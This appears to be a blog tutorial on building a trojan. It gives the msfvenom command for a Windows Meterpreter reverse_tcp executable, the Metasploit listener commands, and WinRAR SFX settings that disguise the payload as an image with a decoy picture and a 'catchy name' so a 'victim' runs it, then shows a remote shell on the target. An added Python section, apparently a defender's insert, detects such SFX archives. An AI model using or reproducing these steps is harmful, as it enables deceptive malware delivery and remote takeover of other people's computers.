Hide Payloads Behind Images.

Chamo Wijetunga
7 min read · Apr 24, 2020


This is only for Educational Purposes.

What is a Payload?

Well, a payload can be considered somewhat similar to a virus. A payload is a piece of malicious code that carries the crucial part of an attack and can be used to compromise a device. … Generally, a payload refers to code that a hacker designs according to his/her requirements.

In the world of malware, the term payload is used to describe what a virus, worm or Trojan is designed to do on a victim's computer. For example, the payload of a malicious program may include damage to data, theft of confidential information, and damage to computer-based systems or processes.

A payload is custom code that the attacker wants the target system to execute, selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that "binds" a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.

What is msfvenom ?

It is a tool that ships with the Metasploit Framework. According to the Rapid7 blog,

The Metasploit Framework has included the useful tools msfpayload and msfencode for quite some time. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Now I would like to introduce a new tool which I have been working on for the past week, msfvenom. This tool combines all the functionality of msfpayload and msfencode in a single tool. Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance, handles all possible output formats, and brings some sanity to payload generation.

How does this work?

First of all you need a Kali Linux operating system, either in a virtual environment or as a stand-alone dual-boot installation. The Metasploit Framework comes with Kali Linux as a default tool, so we don't have to download it from other repositories. Then fire up the terminal and create the .exe file with the payload attached to it.

I have the latest Kali version installed in a virtual environment alongside Windows 10.

Then type ifconfig in the console and find out the host IP address.

My IP address

Then we fire up msfvenom and create the .exe file with the payload included, using this command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f exe -o /root/Desktop/testviruse.exe

Here we set the local host (LHOST) to my Kali Linux IP address and the listening port (LPORT) to 4444. The output format is .exe, the payload embedded in the .exe is windows/meterpreter/reverse_tcp, and the file name is testviruse.exe.

created a file with the payload in it

What is reverse_tcp ?

reverse_tcp is a type of Meterpreter reverse shell. There are primarily two types of attacks, direct attacks and client-side attacks, so Meterpreter gives you the option of a BIND shell or a REVERSE shell. A reverse shell is more likely to pass through firewalls, because the client/victim makes the connection back to the attacker. You have to set up a listener on the attacker's machine, and whenever the client PC connects, you get a Meterpreter session.

After that we have to fire up the Metasploit console. I am dragging and dropping the .exe file into my Windows workspace. That's where Windows Defender comes into play: for testing purposes I disable the antivirus program manually.

Change the active states

Now drag and drop works. After that, let's move to the msfconsole in Kali.

msf console

First we have to configure the handler and get it ready to listen. We select the multi/handler module:

use multi/handler

That module is the listener that receives the connection from our payload.

set payload windows/meterpreter/reverse_tcp

We set the payload to windows/meterpreter/reverse_tcp again, so that it matches the executable, and then set LHOST and LPORT (the listener's host IP address and port).

set LHOST 192.168.1.103

set LPORT 4444

Then we set the ExitOnSession boolean option to false. Setting it to false means the handler is not shut down when a session is created or ends, which has some interesting uses: it keeps accepting connections back to the listener. Then we can start the handler simply by typing exploit -j. Because the handler runs as a job, it keeps running even if a Meterpreter session is closed or fails. This only applies to jobs (-j), as these are the only ones that run in the background.

set exitonsession false

exploit -j

Set up console

Then I move into Windows to hide the executable file inside an image. First of all, download or get any picture you like and convert it to an icon using an online tool.

ICO Converter

https://icoconvert.com/

1. Upload the Image

After that, set the icon size to 256 × 256, click Convert ICO, and download the icon.

2. Converting and Downloading

Then select both the picture (not the icon) and the payload-filled .exe file and create an archive with WinRAR using some customized settings.

3. Add to archive

In the archive dialog choose any archive name you want (be tricky and pick a catchy name), set the compression method to Best, and tick the Create SFX archive option. This step is required to get the result we want.

4. General Setup

Then move to the Advanced options tab of the WinRAR window and select SFX options.

5.SFX options

Select the Update module, set the extract mode to Extract and update files, and set the Overwrite method to Overwrite all files.

6. rar update settings

Then move to the Setup module and set the execution order you want.

7. Execution Order

In my case I want to execute my malicious file first and open the image second, so I typed:

testvirus.exe

raw.png

Here raw.png is the name of my image file. OK, then we have to assign the icon we created to this executable file. Select the Text and icon module and load the SFX icon from the file (the last option).

8.Setting up the icon

Then click OK, go back to the previous window, and create the file.

9. All set

Here you can see the final executable file and the other files I used to create it. And that's all: after the victim double-clicks the file, the magic happens in msfconsole.
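As an added defender-side example (not part of the original post), here is a Python heuristic that checks whether a Windows executable is a WinRAR SFX stub with an appended archive and, when the SFX comment is stored uncompressed, pulls out the Setup=/Silent=/Overwrite= directives so a scanner can flag the pattern built above: an executable run first and an image opened as a decoy. The sample bytes are constructed and not a real binary; the RAR4/RAR5 signatures are the archive magic values, and compressed comments are deliberately not handled.

```python
import re

RAR4_SIG = b"Rar!\x1a\x07\x00"       # RAR 1.5-4.x archive signature
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"   # RAR 5.x archive signature
RUNNABLE = (".exe", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")
DECOY = (".png", ".jpg", ".jpeg", ".gif", ".pdf", ".docx")
DIRECTIVE = re.compile(rb"(Setup|Silent|Overwrite|TempMode|Title|Path)=([^\r\n\x00]*)")

# Constructed sample (hypothetical, not a real binary): MZ/PE-like stub, appended RAR4
# archive and an uncompressed SFX comment in the layout the post builds.
SAMPLE_SFX = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 200
    + RAR4_SIG + b"\x00" * 16
    + b"Setup=testvirus.exe\r\nSetup=raw.png\r\nOverwrite=1\r\nSilent=1\r\n"
    + b"\x00" * 32
)

def find_embedded_rar(data: bytes) -> int:
    """Offset of a RAR signature inside a PE file (SFX stub), or -1 if none."""
    if not data.startswith(b"MZ"):
        return -1
    hits = [h for h in (data.find(s) for s in (RAR5_SIG, RAR4_SIG)) if h > 0]
    return min(hits) if hits else -1

def extract_sfx_script(data: bytes, rar_off: int) -> dict:
    """Collect Key=value SFX directives found in the stored (uncompressed) comment."""
    script = {}
    for key, value in DIRECTIVE.findall(data[rar_off:]):
        script.setdefault(key.decode(), []).append(value.decode(errors="replace"))
    return script

def assess(data: bytes) -> dict:
    """Flag an SFX that runs an executable, optionally silently, next to a decoy file."""
    rar_off = find_embedded_rar(data)
    if rar_off < 0:
        return {"sfx": False, "suspicious": False, "reasons": [], "script": {}}
    script = extract_sfx_script(data, rar_off)
    setup = [s.strip().lower() for s in script.get("Setup", [])]
    runs_exe = [s for s in setup if s.endswith(RUNNABLE)]
    decoys = [s for s in setup if s.endswith(DECOY)]
    reasons = []
    if runs_exe:
        reasons.append("Setup runs executable: " + ", ".join(runs_exe))
    if runs_exe and decoys:
        reasons.append("decoy file opened alongside executable: " + ", ".join(decoys))
    if "Silent" in script:
        reasons.append("Silent= set, extraction dialog suppressed")
    if "Overwrite" in script:
        reasons.append("Overwrite= set, existing files replaced without prompting")
    return {"sfx": True, "suspicious": bool(runs_exe), "reasons": reasons, "script": script}
```

Run assess() over a file's bytes; a plain RAR archive (no MZ stub) and a plain PE with no embedded archive both come back with sfx False.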

session is created with the victim

Like that, a session is created. Let's look at the details and try to open a shell on the victim's machine.

info

This is what the info looks like. There are 2 users logged in: one is the authorized me and the other one is the unauthorized me. :) Let's open a shell.

shell

A shell is created, easy as that. Let's see what's on my desktop. ;)

My windows desktop from the shell

So that is how I hacked my own machine, but only with Defender switched off. Let's see what happens when I enable it: the session dies. That's why it is a good habit to let Windows update itself when it asks.

There are other ways, and there will be more zero-day vulnerabilities waiting to be found. But the thing is, privacy is a myth.
